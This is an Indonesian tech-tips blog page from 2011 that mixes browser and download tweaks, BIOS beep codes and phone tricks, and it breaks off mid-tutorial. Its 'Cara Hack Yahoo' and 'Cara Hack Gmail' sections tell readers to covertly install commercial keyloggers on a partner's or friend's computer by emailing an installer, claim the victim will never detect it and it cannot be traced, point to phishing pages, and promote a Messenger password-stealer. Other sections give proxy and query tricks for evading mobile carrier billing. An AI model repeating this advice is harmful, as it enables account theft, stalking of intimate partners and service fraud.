Saturday, April 30, 2011

Download Fasterfox versi 3.8.4 Mempercepat Koneksi Firefox

Apa Itu Fasterfox : adalah suatu add-on yang menempel pada program Mozilla Firefox. add-on ini dikeluarkan oleh mozdev.org. Fungsi utama dari addon ini adalah untuk mempercepat proses browsing kita menggunakan program Mozila Firefox, Secara nyata jika di bandingkan dengan Browser yang lain maka jauh lebih cepat di bandingkan dengan Mozila yang menggunakan Browser addon ini.

Browser seperti Opera 10 yang diklaim sebagai browser paling cepatpun keliatan akan lambat jika kita sudah menggunakan addon ini, Safari yang juga mengklaim sebagai browser tercepat kalah jika menggunakan Addon Fasterfox ini. Google Chrome sebagai browser teringanpun akan kelihatan jauh tertinggal dengan addon ini.

Fasterfox versi 3.8.4 ini hanya kompatible pada mozilla firefox versi 3. 6 keatas, untuk itu jika anda ingin menjajal kelebihan add ons ini, segera upgrade firefox anda ke versi 3.6. Menurut saya, setelah memasang add ons fasterfox versi 3.8.4 ini, penambahan kecepatan browsing tidak terlalu signifikan, tapi…tetap ada perubahan kecepatan, walaupun hanya sedikit.
tapi jika anda sudah frendly dengan firefok versi 2.0 bisa di download dibawah ini

Download Fasterfox versi 3.6 keatas
Download  Fasterfox versi 3 ke bawah

Cara setting IDM lebih cepat

cara setting IDM ( internet download manager ) agar lebih cepat

IDM mungkin merupakan download manager paling cepat saat ini. Tapi tahukah anda jika IDM dapat dibuat lebih cepat lagi. Okeikuti cara berikut :

1.Pastikan speed limter dalam posisi turn off.
2. Buka file -> option-> connection,
3.Pastikan pada Connection type/speed terisi dengan pilihan "LAN 10Mbs".
4.Pastikan default "Default max connection number" terisi dengan piliihan "16";
5.Untuk pengguna rapidshare premium,Sebelum anda men-download file, copy linknya terlebih dulu. Pilih tab site logins..masukkan username dan password. Kemudian pindah ke tab connection, pilih yang exception pilih new, pilih http, trs paste-kan link download yang dicopy tadi, trs max connection numbernya 16. Trik ini dapat meningkatkan kecepatan sampai 20%.

Trik Membuka Proteksi Klik Kanan Sebuah Website

Pernah buka detik.com kan? Saya rasa hampir semua netter Indonesia mengetahui web tersebut. Mungkin saat ini web tersebut adalah web portal berita terbesar di Indonesia. Banyak berita-berita yang diupdate tiap harinya di website tersebut.

Namun saya sering sekali menerima keluhan mengenai proteksi klik kanan di web tersebut dan juga bagaimana cara menanggulanginya, karena ada diantara beberapa rekan saya yang ingin mengambil berita dari website tersebut.

Detik.com bukanlah satu-satunya web yang menggunakan proteksi atas klik kanan di websitenya. Ada juga kafegaul.com dan mungkin banyak web lagi. Kedua web yang saya sebutkan itu memproteksi klik kanan pada tiap artikel. Artinya, pada halaman indeks, kita masih bisa menggunakan klik kanan, namun pada halaman artikel full, klik kanan sudah terproteksi.

Sebenernya, untuk menembus proteksi tersebut cukup gampang. caranya adalah sebagai berikut.

Jika anda seorang webmaster, tentunya tau pemrograman seperti apa yang digunakan untuk melakukan
proteksi tersebut. Proteksi tersebut menggunakan javascript.

Nah… mulai keliatan kan gimana cara melewatinya? yup.. kuncinya di settingan browser anda. Saya ambil contoh browser yang mulai terkenal di kalangan netter yaitu firefox. pada saat ini saya menggunakan firefox 1.5 (cupu.. di warnet alnya). Maka caranya adalah :

1. Klik Tools pada menu Firefox anda
2. Kemudian pilih Options
3. Akan ada beberapa Tab paling atas, pilih Content.
4. Kemudian hilangkan tanda centang pada Enable Javascript
5. Klik OK

Mengubah Mozilla Firefox Seperti Opera Mini

 Pernah kepikiran untuk membuka situs mobile atau wap site dari PC? Tentu susah unutk membuka berbagai site misalnya m.kaskus.us atau waptrick atau juga wen.ru Selain pakek cara susah yaitu dengan SJ Boy lalu membuka Opera Mini, ternyata terdapat cara yang lebih mudah. Gimanakah caranya?

Nah Trik kali ini bkal membahas tentang bagaimana caranya untuk menipu web yang kita kunjungi agar menganggap kalau kita berselancar menggunakan hp. langsung aja ke tutornya (santai aja gak pakai download).

CARA PERTAMA
tapi cara ini gak permanen
1. pada FireFox buka tab baru trus di address bar ketik : “about:config”
(tanpa tanda titik dua “:”)
2. muncul kotak dialog, pilih “i’ll be carefull, i promise”
3. klik kanan di sembarang tempat, pilih “New –> String”
4. Muncul kotak “Enter the preference name” masukkan “general.useragent.override” (tanpa tanda titik dua)
5. Muncul kotak “Enter String value” masukkan “Opera Mini” lalu klik OK

6. selesai deh, langsung saja buka web yang nggak bisa dibuka pakai komputer Contohnya Wapdam.com
Tampilan sebelum di lakukan trik ini



Tampilan Sesudah Dilakukan Trik



“trus Cara Ngembaliinnya gimana?”
Gampang kok tinggal klik kanan string yang baru dibuat trus pilih reset

CARA KEDUA 


Cara kedua ini dengan menggunakan bantuan add ons,
Namanya User Agent Switcher yang dapat di download disini. Cara kerjanya menyamarkan browser Firefox kita agar terdeteksi sebagai browser HP. Mudah kan? Sebelumnya pastikan dulu add-on tersebut sudah terpasang, lalu restart Firefox Anda. Kemudian pilih: Tools->Default User Agent->Edit User Agent->New User Agent.Berikut ini ada beberapa settingan yang bisa saya temukan dan terbukti dapat digunakan:
Deskripsi :Opera Mini
User Agent :Opera/9.50 (J2ME/MIDP; Opera Mini/4.1.10781/302; U; en)
Deskripsi :Opera Mobile 9.33b
User Agent :Opera/9.0 (Microsoft Windows; PPC; Opera Mobile/331; U; en)
Deskripsi :BlackBerry 8800
User Agent :BlackBerry8800/4.5.0.9 Profile/MIDP-2.0 Configuration/CLDC-1.1

Jika Anda masih belum yakin, dapat di tes di http://whatsmyuseragent.com hanya dengan mengunjunginya (bukan jebakan betmen kok :D ). Sebaiknya di cek sebelum dan setelah penginstallan addon tersebut.Jika ingin mengembalikan settingan tersebut, tinggal default user agent di Menu Tools. Browser anda akan kembali menjadi Modzilla Firefox, bukan lagi Opera Mini maupun BlackBerry.

Trick Internet Gratis 3 Yang Masih Lancar

TRIK Operamini Handler.

SET OPMIN:
HTTP SERVER:
http://server4.operamini.com:80/
SOCKET SERVER:
socket://server4.operamini.com:1080
FRONTQUERY:
m.fb.snaptu.com.t9space.com/power/s/http/
USEPROXY:
HOST
PROXYSERVER:
m.fb.snaptu.com

TRIK BROWSER HAPE
SET HAPE :
APN : 3gprs
Proxy: 10.4.0.10
Port : 3128
Langsung aja ketikan di alamat:
http://m.opera.com.240hours.appspot.com/http/url_7an
atau
http://m.opera.com.t9space.com/power/s/http/url_7an

Alternatif HOST
www.tri.co.id
wap.tri.co.id
wap.three.co.id
wap.hutch.co.id
wapshop.gameloft.com
gameloft.com
dl.gameloft.com
tri.vuclip.com
wap.vuclip.com
3g.vuclip.com
m.vuclip.com
m.opera.com
blueapple.moby
server4.operamini.com
m.facebook.com
0.facebook.com

Atau jika gak mau repot download aja Opmin yang sudah di seting disini

Update 3 Maret 2011
Trik yang masih hidup dan tetap utuh adalah pake Trix Bugil dan Trik IP Opmin
Untuk yang GPRS standart Query yang masih hidup adalah m.fb.snaptu.com pasang Query ini di BACKQUERY : ?m.fb.snaptu.com/ pada aplikasi handler anda.

Update 27 April 2011
Bugil/No IP
SET HAPE :
APN : 3gprs
Proxy: No Proxy (proxy&port kosongin)

SET OPMIN:
Default / No Setting
IP Opmin
SET HAPE :
APN : 3gprs
Proxy: 195.189.142.132
Port : 80

SET OPMIN:
Default / No Setting
Standart
SET HAPE :
APN : 3gprs
Proxy: 10.4.0.10
Port : 3128

SET OPMIN:
(a). Option 1
HTTP SERVER:
http://65.49.33.37@server4.operamini.com:80/
SOCKET SERVER:
socket://server4.operamini.com:1080
FRONTQUERY:
65.49.33.37@

(b). Option 2
HTTP SERVER:
http://server4.operamini.com:80/?.vuclip.com/
SOCKET SERVER:
socket://server4.operamini.com:1080
FRONTQUERY:
65.49.33.37@

(c). Option 3
HTTP SERVER:
http://server4.operamini.com:80/
SOCKET SERVER:
socket://server4.operamini.com:1080
FRONTQUERY:
65.49.33.37@
USEPROXY:
HTTP
PROXYSERVER:
server4.operamini.com?.vuclip.com/

Browser Hape
SET HAPE :
APN : 3gprs
Proxy: 10.4.0.10
Port : 3128
Langsung aja ketikan di alamat:
http://65.49.33.37.1234hours.appspot.com/http/url_7an
atau
http://url_7an?m.fb.sanaptu.com/

Set App Handler
Ucweb, Mig33 ,Bolt ,Google Map, Mxit, dan Aplikasi Handler Lainnya:
BACKQUERY: ?m.fb.snaptu.com/

Ebuddy :
BACKQUERY: ?m.vuclip.com:80/
PROXY TYPE: HTTP
PROXY SERVER: 38.99.73.52:80

Alternatif Query
65.49.33.37/73
66.160.159.001/002/003/447,dll
72.20.112.999
91.203.96.125
202.53.250.114/116
207.7.37.11

?.vuclip.com/
?m.fb.snaptu.com/
?dmg2.fb.snaptu.com/

Trick Internet Gratis Indosat Yang Masih Lancar

Ini gak gratis total, cuma pengiritan. kepotong Rp.3-5,-/konex. Sebelumnya pastikan nomer isat anda dalam paket IM3 24. untuk mendaftar, ketik saja
*777*1*1*5#
TRIK OPMIN
SET HAPE :
APN : indosat gprs
Proxy: 195.189.142.132
Port : 80

SET OPMIN:
HTTP SERVER:
http://0.facebook.com
SOCKET SERVER:
socket://0.facebook.com
FRONTQUERY:
kosong
PROXY TYPE:
Host
PROXYSERVER:
mini.opera.com

atau:
SET OPMIN:
HTTP SERVER:
http://195.189.142.132:80/
SOCKET SERVER:
socket://195.189.142.132:1080
FRONTQUERY:
kosong
PROXY TYPE:
HTTP
PROXYSERVER:
0.facebook.com


TRIK UCWEB
SET HAPE :
APN : indosat gprs
Proxy: 76.126.123.199
Port : 80


SET UCWEB :
PROXY TYPE:
HTTP
PROXYSERVER:
0.facebook.com


TRIK BOLT
SET HAPE :
APN : indosat gprs
Proxy: 174.132.97.130
Port : 80


SET BOLT 2.10/2.11 :
PROXY TYPE:
HTTP
PROXYSERVER:
0.facebook.com


TRIK SNAPTU
SET HAPE :
APN : indosat gprs
Proxy: 83.138.187.32
Port : 80


SET SNAPTU :
PROXY TYPE:
HTTP
PROXYSERVER:
0.facebook.com


NB: Pastikan anda dapat mengakses 0.facebook.com, serta sudah kirim 2 sms

TRIK MENGETAHUI KERUSAKAN PADA KOMPUTER


Pada saat komputer kita menghadapi masalah yang tidak jelas (monitor tidak menyala, tidak ada indikator apapun, atau bahkan blank tidak ada tanda-tanda kehidupan) maka kita harus mencari penyebab masalah tersebut, PC pada umumnya memiliki speeker internal yang dapat memberikan informasi mengenai titik rusak / titik dimana komputer kita berhenti/stack pada saat booting, nah di tulisan ini saya akan sedikit memberikan informasi menganai tanda bunyi Beep dan kerusakan pada bagian apa.
Indikator Suara dan keterangan bagian yang stack
  • *1 x —> Kegagalan refresh DRAM (Sistem mempunyai masalah mengakses memori untuk merefreshnya).
    * 2 x —> Kegegalan rangkaian parity (Pada data yang ditransmisikan dalam komputer, biasanya ditambahkan parity bit yang berfungsi untuk mendeteksi dan koreksi error. Pekerjaan ini dilakukan oleh rangkaian parity yang terdapat dalam komputer. Hal ini kemungkinan disebabkan oleh adanya masalah pada memori atau motherboard).
    * 3 x —> Kegagalan rangkaian parity (Pada data yang ditransmisikan dalam komputer, biasanya ditambahkan parity bit yang berfungsi untuk mendeteksi dan koreksi error. Pekerjaan ini dilakukan oleh rangkaian parity yang terdapat dalam komputer. Hal ini kemungkinan disebabkan oleh adanya masalah pada memori atau motherboard. Kegagalan base memori 64K. Base memori 64 K adalah 64 KB memori yang pertama pada RAM. Kegagalan ini bisa disebabkan oleh slot memori yang dikelompokkan dalam modul memiliki chip yang rusak. Hal ini berhubungan dengan kerusakan motherboard).
    * 4 x —> Kegagalan system timer (Kemungkinan ada kesalahan pada satu atau lebih timer yang digunakan untuk mengontrol fungsi-fungsi pada motherboard).
    * 5 x —> Kegagalan prosesor (Dapat disebabkan oleh panas yang berlebih, atau karena prosesor tidak terpasang benar ke dalam socketnya).
    * 6 x —> Kegagalan keyboard controller/gate A20 (Keyboard controller adalah chip pada motherboard yang mengendalikan keyboard Anda).
    * 7 x —> Kesalahan pada prosesor.
    * 8 x —> Kegagalan baca/tulis memori display.
    * 9 x —> Kerusakan pada BIOS.
    * 10x —> Kesalahan pada CMOS.
    * 11x —> Kerusakan pada cache memori.
Kerusakan/trobleshoot pada Hardware bisanya bisa di tanggulangi dengan pembersihan komponen yang rusaknya, misal RAM dibersihkan, Processor dll, namun jika dikarenakan listrik/petir habis lah sudah.
Memang ada sedikit perbedaan masalah bunyi dikarenakan model jenis BIOS, adapun sebagai berikut :
:: Pada Ami BIOS
============
1. Bunyi BEEP hanya sekali sahaja.
Kemungkinan RAM (random access memory) mempunyai masalah atau pun tidak dipasang dengan betul.

2. BEEP sebanyak enam kali
Kemungkinan keyboard / papan kekunci anda sudah rosak atau tidak dipasangkan dengan betul pada p/s2 port atau USB port.
3. BEEP sebanyak lapan kali
Kemungkinan VGA (Video Graphics Array) kad atau pun graphic card anda mengalami masalah atau pun tidak dipasang dengan betul.
4. BEEP sebanyak 11 kali
Checksum Error iaitu melibatkan bateri CMOS anda pada motherboard. Anda boleh menukar bateri CMOS yang baru jika mengalami masalah ini.
:: Award BIOS
==========
1. Bunyi BEEP yang panjang
Memori anda mempunyai masalah atau tidak dipasang dengan betul.

2. 1 BEEP panjang dan 2 BEEP pendek
VGA kad atau graphic kad mempunyai masalah atau tidak dipasang dengan betul.

3. 1 BEEP panjang, 3 BEEP pendek
Kemungkinan keyboard anda bermasalah atau tidak dipasang dengan betul pada p/s2 port atau USB port.
4. Bunyi BEEP yang berpanjangan (contiuouns BEEP)
RAM atau VGA kad anda tidak dipasang dengan betul.

:: Pheonix BIOS
=============
1. 1 BEEP, 1 BEEP dan 4 BEEP
Disebabkan BIOS anda tidak berfungsi. Boleh update atau flash BIOS.

2. 1 BEEP, 2 BEEP dan 1 BEEP
Disebabkan motherboard anda yang sudah rosak.

3. 1 BEEP, 3 BEEP dan 1 BEEP
RAM anda mungkin bermasalah atau tidak dipasang dengan betul.

4. 3 BEEP, 1 BEEP dan 1 BEEP
Adalah disebabkan masalah motherboard computer anda.

5. 3 BEEP, 3 BEEP dan 4 BEEP
VGA kad atau graphic anda bermasalah atau tidak dipasang dengan betul.

Sekian dulu ya……..
Seperti kata pepatah…. Tak ada gading yang tak retak…. maka bisa saja apa yang saya kemukakan disini tidak sesuai dengan kenyataan di lapangan…. Langkah terbaik untuk mengetahui dengan pasti permasalahan yang terjadi karena bunyi beep tersebut adalah dengan menguji coba pada PC yang berfungsi dengan benar. Coba anda ganti satu persatu dengan komponen yang dicurigai bermasalah. Hal ini juga sering saya lakukan biarpun saya sudah mempunyai panduan bunyi beep tsb.

Cara Hack Yahoo

Kadang tiap waktu  saya berfikir dikala saya lagi marah dengan pujaan hati bagaimna cara hack password yahoo Email dari pujaan  hatiq atau dikala temen2 bertanya bagaimna cara hack password yahoo? Jadi jika Anda bertanya-tanya untuk hack yahoo dan menangkap pasangan selingkuh, gadis/ cowok teman maka ini adalah posting untuk anda dalam posting ini saya akan memberikan cara-cara nyata dan bekerja untuk hack password yahoo.

Apakah mungkin kita dapat hack Yahooo?

Ya! Sebagai fakta itu mungkin untuk hack hamper semua password email. Tetapi sebelum Anda belajar cara nyata untuk hack password Yahoo. Berikut adalah hal yang harus kita tahu.
1.       Jangan pernah percaya layanan  Hacking yang mengklaim hack password email yahoo hanya sebesar  900000 ribua atau 2000000 ribu. Saya telah mencoba banyak layanan tersebut dan telah  menemukan bahwa mereka tidak lebih dari penipuan.
2.       Dengan pengalaman saya sekitar  7 tahun di bidang hacking dan ilmu computer . saya dapat member I  tahu Anda bahwa hanya ada Dua cara untuk hack password Yahoo.  Yaitu dengan  menggunakan keylogging dan Phising semua metode Password lain hacking hanyalah scam atau tidak bekerja! Berikut ini adalah satu-satunya 2 metode yang bekrja sangat mudah.
1.     Cara Termudah untuk HACK YAHOO
Menggunakan keylogger adlah cara termudah untukk hack password Yahoo. Keylogger adalah  program  kecil yang mencatat setiap keystroke (termasuk password) yang diketik pengguna pada keyboard computer tertentu’s. keylogger juga disebut  sebagai program Spy atau perangkat lunak Spy. Untuk menggunakannya anda tidak perlu memiliki pengetahuan khusus. Siapapun yang memiliki  pengetahuan dasar tentang computer dapat menggunakannya. Dengan pengalaman saya. Saya merekomendasikan 2 keylogger berikut sebagai yang terbaik untuk hacking password Yahoo.

1.     SniperSpy

2.      WinSpy

Bagaimana cara menggunakan Yahoo SniperSpy untuk hacking?

Anda dapat hack password Yahoo menggunakan SniperSpy sebagai berikut:
1.       Setelah Anda membelinya, Anda akan dapat membuat modul instalasi. Anda perlu email modul ini ke remote user sebagi lampiran.
2.       Ketika remote user menjalankan modul itu akan mendapatkan terinstal diam-diam dan proses pemantauan akan dimulai. Tombol yang ditangkap dan mengupload ke server SniperSpy terus menerus.
3.       Anda dapat login ke account SniperSpy Anda (Anda mendapatkan ini setelah pembelian) untuk melihat  log yang beisi password. Dengan cara ini Anda dapat hack Yahoo SniperSpy atau menggunakan email.
Kerja dari Winspy hampir sama dengan SniperSpy
Saya tidak punya akses fisik ke computer target, apakah saya masih dapat  menggunakan SniperSpy?
Ya , Anda masih dapat menggunakanya untuk hacking Yahoo. Karena keduanya SniperSpy dan Winspy menawarkan Fitur. Dengan fitur ini Adalah mungkin untuk jarak jauh menginstal keylogger pada PC korban. Namun mereka juga dapat bekerja pada computer local.]
Setelah saya menginstal SniperSpy bisa korban dating untuk mengetahui tentang  keberadaan program itu?
Nomor Korban tidak akan pernah  akan tahu tentang kehadirannya di komputernya dia. Hal ini karena, setelah di install keylogger akan berjalan dalam mode siluman total. Tidak seperti program lain tidak akan pernah muncul di star-menu, start-up, file program, menambah/ menghapus program dan task manager.
Dapatkah saya ditelusuri kembali jika saya menginstalnya pada beberapa computer lain?
Tidak, hamper tidak mungkin untuk melacak kembali kepada Anda  untuk menginstal keylogger pada PC lain.
Bagaimana menggunakan SniperSpy secara aman?
sniperSpy benar-benar aman untuk digunakan karena semua database pelanggan tetap rahasia dan pribadi. Mereka tidak mengumpulkan informasi dari system anda dan tidak akan menghubungi Anda dengan cara apapun kecuali jika Anda meminta bantuan.

1.      Haruskah aku pergi ke WinSpy atau SniperSpy?
Saya sarankan SniperSpy sebagai yang terbaik dengan alasan berikut
SniperSpy sepenuhnya kompatibel dengan Windows 2000/XP/Vista/Windows 7 dan juga Mac
SniperSpy bisa bypass firewall apapun
SniperSpy telah mendapat perhatian media dari jaringan berita seperti BBC, CNN dan CBS.
Oleh karena itu terkenal dan dapat dipercaya
Jadi apa yang Anda tunggu? Pergi ambil SniperSpy dan mengekspos kebenaran sekarang!

Klik Disini untuk Download SniperSpy untuk Windows

Klik Disini untuk Download SniperSpy untuk Mac





3.       CARA LAIN UNTUK HACK YAHOO
Trik yang paling umum digunakan lain untuk hack password Yahoo adalah menggunakan Fake Login page ( juda disebut sebagai Phising) Hari ini, halaman login palsu teknik yang paling banyak digunakan untuk hack password Yahoo. Sebuah halaman Fake Login adalah halaman yang muncul persis seperti  halaman Login situs seprti Yahoo. Gmail dll Tapi begitu kita msukkan password kita di sana. Akhirnya kita kehilangan nya.
Namun membuat halaman login palsu dan mengambil  secara online untuk berhasil ack password Yahoo bukalah pekerjaan mudah . hal ini menuntut pengetahuan teknis  mendalam tentan HTML dan bahasa scripting seprti PHP, JSP dll. Jadi jika Anda baru konsep password hacking maka sya sarankan menggunakan keyloggers untuk hack password Yahoo karena  itu cara termudah.

Cara Hack Gmail

Gmail adalah salah satu layanan email yang paling banyak digunakan di seluruh dunia dan tak heran mengapa banyak orang hack Gmail. Jika Anda ingin tahu cara hack gmail maka ini adalah posting untuk anda. Di sini, di posting ini saya akan menunjukkan beberapa cara yang nyata dan bekrja untuk hack Gmail dan juga akan membuat Anda menyadari penipuan dan mitos yang berhubungan dengan hacking Gmail .
Sebelum saya membahas cara hack Gmail saya ingin membuat pembaca sadar akan penipuan umum dan mitos yang berhubungan dengan hacking Gmail atau email lainnya. Jadi di sini kita pergi ke
1.       Tidak ada software buatan yang siap/ program yang akan hack Gmail hanya dengan satu klik tombol. Jadi tidak pernah tertipu oleh sesuatu yang disebut software hacking Gmail. Jika terdpat program tersebut untuk hack Gmail maka itu tidak lebih dari scam.
2.       Sebagian besar layanan hacking email pada klaim internet untuk hack password Gmail hanya biaya yang kecil. Saya secara pribadi telah banyak menguji layanan tersebut dan menemukan bahwa sebagian besar dari software mereka adalah penipuan.
Pada titik ini Anda mungkin bertanya-tanya apa cara lain untuk hack Gmail. Jadi di sini adalah cara kerja untuk hack Gmail.
1.       Keylogging
2.       Phisinng
Setiap metode lain untuk hack Gmail selain  metode yang dua di atas hanya scam atau bekrjanya don’t.
Cara Termudah Untuk Hack Gmail
Cara termudah untuk hack Gmail adalah melalui keylogging. Hal ini dilakukan dengan menggunakan program kecil/ software yang disebut keylogger. Keylogger saat ini dapat diinstall di computer manapun dan dapat menangkap setiap password termasuk keystroke. Juga bekrja dalam modus sembunyi-sembunyi lengkap dengan sepenuhnya bersembunyi sendiri. Jadi menginstal keylogger pada computer adalah cara termudah untuk hack Gmail. Setelah korban log kea kun Gmail dari computer ini username & passeord Gmail-nya diambil dan simpan langsung. Yang tersimpan log yang dikrimkan kepada anda melalui email. Tapi bagaimana jika tidak mempunayai akses fisik ke computer? Nah , masih Anda tidak perlu khawatir karena saya akan menyarankan salah satu program keylogger terbaik yang mendukung instalsi pada computer local maupun computer remote. Berikut ini software keyloger yang  bisa instalasi jarak jauh.
SniperSpy
Jadi untuk hack account Gmail semua yang perlu Anda lakukan adalah menginstal keylogger pada computer dari mana korban kemungkinan untuk login ke account Gmail-nya. Jika anda tidak memiliki akses fisik maka Anda perlu untuk menggunakan instalasi jarak jauh untuk remote menyebarkan keylogger tersebut .
Catatan: untuk informasi lebih lanjut tentang keylogger baca posting saya Cara menggunakan Keylogger
Cara Lain Untuk Hack Gmail
Trik yang paling umum digunakan lain untuk hack Gmail menggunakan Fake Login Page (juga disebut sebagai Phising). Hari ini, halaman login palsu teknik yang paling banyak digunakan untuk hack Gmail. Sebuah halaman Fake Loogin adalah halaman yang muncul persis seprti halaman Login situs seprti Yahoo, Gmail dll Tapi begitu kita masukkan password kita disana, akhirnya kita kehilangan itu.
Namun membuat halaman login palsu dan mengambil secara online untuk berhasil hack password Gmail bukanlah pekerjaan mudah . hal ini menuntut pengetahuan teknis mendalam tentan HTML dan bahasa scripting seperti PHP, JSP dll. Jadi jika Anda baru konsep password hacking. Maka saya sarankan menggunakan keyloggers untuk hack karena itu cara termudah.

CARA HACK PASSWORD YAHOO MESSENGER

Hack Password Yahoo Messenger: Yahoo Messenger Password Stealer 10 | Magic PS v1.5 SE + + | A tool for Kids & noobs


  • MPS adalah Pengirim Password Powerfull untuk
  • Yahoo Messenger
  • MPS mengirim korban id & lolos ke id
  • Bekerja tanpa smtp dan script
  • Diuji di Win98-Me-NT-2000-XP-Vista-7

Cara Menyisipkan Kartu CDMA ke GSM

Teknologi HandPhone CDMA dan GSM terkadang membuat orang bingung harus memilih yang mana, di satu sisi, CDMA dikenal karena biaya operasional  yang lebih murah, namun disisi lain GSM punya keunggulan jangkauan yang lebih luas.

Trik ini sebenarnya sudah lama, tapi mungkin hanya sedikit yang tahu dan biasanya paling cuma orang-orang counter HP saja. Tapi karena trik ini sebenarnya bukanlah suatu rahasia besar (TOP SECRET) yang hanya orang tertentu saja yang boleh tahu, maka aq akan mengungkapkannya disini.

Manfaat yang bisa didapatkan dengan menyisipkan nomor CDMA ke nomor GSM antara lain:
HP GSM akan memiliki 2 nomor sekaligus dalam satu Handphone.
HP anda akan dapat dihubungi secara lokal bahkan lewat telepon koin pun bisa.
Nomor CDMA lokal anda masih dapat dihubungi sekalipun berada diluar daerah.
Nggak perlu beli HP CDMA untuk menggunakan nomor CDMA.
Tapi ini bukannya tanpa kelemahan maupun keterbatasan :
Nomor CDMA lokal anda hanya dapat digunakan untuk menerima telepon saja, sedangkan fungsi untuk menelpon, mengirim dan menerima SMS tetap ditangani oleh nomor GSM.
Bagaimanapun juga pulsa nomor CDMA tetap harus diisi sekalipun tidak digunakan, karena nomor CDMA bisa tidak berfungsi kalau pulsa hangus atau kosong.
Dikenakan biaya airtime yang dipotong langsung dari pulsa CDMAnya walaupun cuma terima telepon saja.
Tapi paling nggak Trik ini bisa dimanfaatin bagi anda yang sibuk dan harus mobile ke luar daerah, ataupun untuk tetap keep in touch pada saat pulang kampung ataupun liburan.

Yang harus disiapkan yaitu:
HP GSM dan nomor GSM tentunya untuk ditambahkan nomor CDMA.
HP CDMA sebaiknya dengan Fasilitas Ruim Dual Band yang menggunakan kartu dan bukan yang di injek) seperti : Nokia 2115, 6015, 6016, 6585, dll. Dan nggak perlu beli, karena cuma dipakai sebentar aja, bisa pinjem sama saudara, temen, tetangga ataupun tempat dimana beli nomor CDMA nya.
Kartu Perdana CDMA, pilih yang sesuai untuk di sisipkan ke nomor GSM anda.
Star One untuk : Mentari, IM3, dan Matrix
Flexy untuk : Simpati, Kartu AS, Kartu Hallo
Esia untuk : Simpati, Kartu AS, Kartu Hallo dan XL
Pemilihan kartu harus benar-benar sesuai, jika tidak maka trik ini nggak akan berhasil.

Cara Menyisipkannya:
Masukkan kartu perdana CDMA yang telah dibeli kedalam HP CDMA .
Lakukan Pengaktifan
1. Untuk Star One :
Tekan *92 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *92081512345678
Tekan OK/Yes.. lalu dengarkan
Setelah selesai tutup HP CDMA nya
Di test dengan menelpon ke No. CDMA, jika yang berdering adalah HP GSM berarti anda telah berhasil !!
2. Untuk Flexy :
Tekan *71 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *7108125712345
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup HP CDMA nya
Di test dengan menelpon ke No.CDMA, jika HP GSM anda berdering, maka anda telah berhasil !!
3. Untuk Esia :
Tekan *12 + Nomor HP anda (No. HP GSM yang ingin disisipi) misalnya: *12081612345678
Tekan OK/Yes dan dengarkan...
Setelah selesai tutuh HP CDMA nya
Di test kembali dengan menelpon ke No.CDMA, jika HP GSM anda yang berdering, maka anda telah berhasil !!
Nggak sulit kan, kurang lebih seperti mengisikan pulsa dari voucher yang kita beli saja.

Suatu saat mungkin kita ingin mengembalikan nomor CDMA kedalam kartu asalnya agar bisa digunakan di HP CDMA, berikut cara-cara untuk mengembalikannya.
1. Untuk Star One
Tekan *920
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.
2. Untuk Flexy
Tekan *710
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.
3. Untuk Esia
Tekan *120
Tekan OK/Yes dan dengarkan...
Setelah selesai tutup
Di test dengan menelpon ke nomor CDMA, jika HP CDMA berdering, maka nomor telah kembali ke kartu asalnya.

Cara Abaikan Semua Permintaan Di Facebook Otomatis

Cara Abaikan Semua Permintaan Di Facebook Otomatis
Ignore All Requests
Tentunya Sebagai Facebooker Mania kita sudah sama-sama tahu, jika setiap Hari ada saja Permintaan yang diajukan teman kita untuk kita ikuti. Entah itu Ikut di sebuah Group,Permainan, Aplikasi dan lain sebagainya, sebagai contoh kasus seorang sobit saya ketiban Puluhan Permintaan yang tidak penting setiap harinya. Gara-gara di Cuekin terus otomatis semua Permintaan jadi Numpuk, ini salah satu sebab membuat FB kita Lelet. Setelah ngajak Chat dan minta tolong gimana Abaikan permintaan tersebut sekaligus, Akhirnya saya sarankan menggunakan Script berikut. Kebayang Gak, harus mengabaikan 200 lebih permintaan satu persatu.
Bagi yang punya masalah serupa Silahkan Ikuti langkah-langkah berikut :


Langkah Pertama

Sebelum menambahkan Facebook Ignore All Requests, Anda harus terlebih dahulu menambahkanGreasemonkey . The Greasemonkey add-on akan membiarkan Anda menginstal kode Facebook Ignore All Requests. Dapatkan Greasemonkey add-on, pastikan Bila sudah di Install Ada Gambar monyet di bagian kanan bawah layar.
BILA SUDAH Install Silahkan Lewati Langkah ini Langsung saja Kelangkah Kedua
Silahkan Install Greasemonkey dengan klik link dibawah ini :
Klik Disini Pengguna Firefox 
Klik Add to Firefox
Setelah Selesai maka Restar Firefox anda

Klik disini Untuk Pengguna IE
Klik Download Free
Setelah selesai Restar IE Anda

Langkah Kedua
Silahkan Menuju Tombol Berikut Untuk Install Kodenya
Facebook Ignore All Requests 
Setelah menuju halaman Install Maka Klik lagi Install Tunggulah beberapa saat hingga Proses install selesai.
Restart Kembali Firefox atau IE
Sekarang Silahkan Menuju Account Facebook dan dicoba

Nanti Facebook Ignore All Requests Akan Muncul di Bawah Profile Anda seperti Gambar
dibawah ini :
Klik Saja Link Berikut Untuk Melihat Gambarnya :
Gambar

Tutorial Cara Merubah Nickname Akun Facebook Yang Telah Ditolak Secara System


 Cara mengganti AKUN/NICKNAME facebook yang telah ditolak secara system terotomatisasi administrator facebook.
.
Q Gk Tanggung Jawab Kalo Akun Anda Ke Banned.....

Langkah pertama..
Masuk Privacy keamanan akun atau klik saja link dibawah ini

Ganti Nama
.
Jika sudah masuk kita tinggal klik saja AMANKAN AKUN
untuk dpt masuk verifikasi keamanan akun anda dan klik saja tombol LANJUTKAN
.
Langkah kedua..
Setelah anda masuk maka anda akan disuruh mengganti password anda, ganti saja pke pasword sesuai keinginan anda (jgn smpai lupa pasword bru anda) jika sudah lanjutkan saja ke langkah berikutnya
.
Langkah ketiga..
Setelah anda berhasil merubah pasword maka anda akan dituntun untuk verifikasi akun anda centang saja kolom verifikasi perubahan pasword anda lalu tekan LANJUTKAN (jika anda bikin akun fb pke email) jika bikin pke nmr hape maka langsung saja anda tekan tombol LANJUTKAN.
.
Langkah keempat..
